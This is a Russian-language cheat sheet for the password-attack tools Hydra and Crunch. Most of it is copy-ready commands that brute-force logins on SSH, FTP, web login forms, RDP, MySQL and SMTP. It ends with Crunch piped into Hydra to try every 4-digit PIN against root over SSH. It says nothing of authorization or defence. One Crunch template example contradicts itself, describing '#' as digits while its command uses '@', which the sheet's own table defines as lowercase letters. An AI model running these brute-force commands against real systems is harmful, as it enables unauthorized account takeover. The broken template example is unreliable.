🔐 Hydra + Crunch — Шпаргалка
📌 Что такое:

    Hydra — мощный инструмент для брутфорса сетевых сервисов (SSH, FTP, HTTP, RDP, SMTP и др.)

    Crunch — генератор паролей по шаблонам (числа, буквы, комбинации)

🧰 Hydra — Основы
🔹 Общая структура:

hydra -l <login> -P <passlist.txt> <ip> <протокол>

🔸 Или:

hydra -L <loginlist.txt> -P <passlist.txt> <ip> <protocol>

📘 Примеры Hydra-атак
1️⃣ SSH брутфорс (один логин, список паролей)

hydra -l root -P rockyou.txt ssh://192.168.1.10

2️⃣ FTP с логин-листом и паролями

hydra -L users.txt -P passwords.txt ftp://192.168.1.10

3️⃣ HTTP-форма логина

hydra -l admin -P passlist.txt 192.168.1.10 http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid"

    ^USER^ и ^PASS^ — подстановки логина и пароля

    F=Invalid — слово, которое означает неудачный вход

4️⃣ RDP (Windows удалёнка)

hydra -t 4 -V -f -l Administrator -P rockyou.txt rdp://192.168.1.10

    -f — остановка при первом удачном логине

    -t — кол-во потоков

5️⃣ MySQL брутфорс

hydra -L users.txt -P passlist.txt mysql://192.168.1.10

6️⃣ SMTP (почтовый сервер)

hydra -l user@example.com -P passwords.txt smtp://mail.example.com

🛠 Полезные флаги Hydra
Ключ	Что делает
-l	Один логин
-L	Список логинов
-p	Один пароль
-P	Список паролей
-s	Указать порт
-t	Кол-во потоков
-vV	Подробный вывод
-f	Остановиться при первом успехе
-o file	Сохранение результата в файл
🔢 Crunch — Генерация паролей
📌 Общая команда:

crunch <min> <max> <charset> -o <output.txt>

🔹 Примеры:
1️⃣ Все 4-значные PIN-коды:

crunch 4 4 0123456789 -o pins.txt

2️⃣ Пароли от 6 до 8 символов (только буквы):

crunch 6 8 abcdefghijklmnopqrstuvwxyz -o words.txt

3️⃣ Пароли по шаблону (например: ab## — где # это цифры)

crunch 4 4 -t ab@@ -o abXX.txt

Шаблон	Значение
@	Любая буква (нижн.)
,	Любая буква (верхн.)
%	Любая цифра
^	Все символы
4️⃣ Комбинация: Crunch ➜ Hydra

crunch 6 6 0123456789 | hydra -l admin -P - 192.168.1.10 ssh

    -P - — Hydra берёт пароли из stdin (pipe)

    Генерация не сохраняется в файл — экономит место

🔄 Расширенный пример цепочки

crunch 4 4 0123456789 | hydra -t 4 -l root -P - ssh://192.168.1.10

— Проверка всех 4-значных PIN на SSH без создания файла.
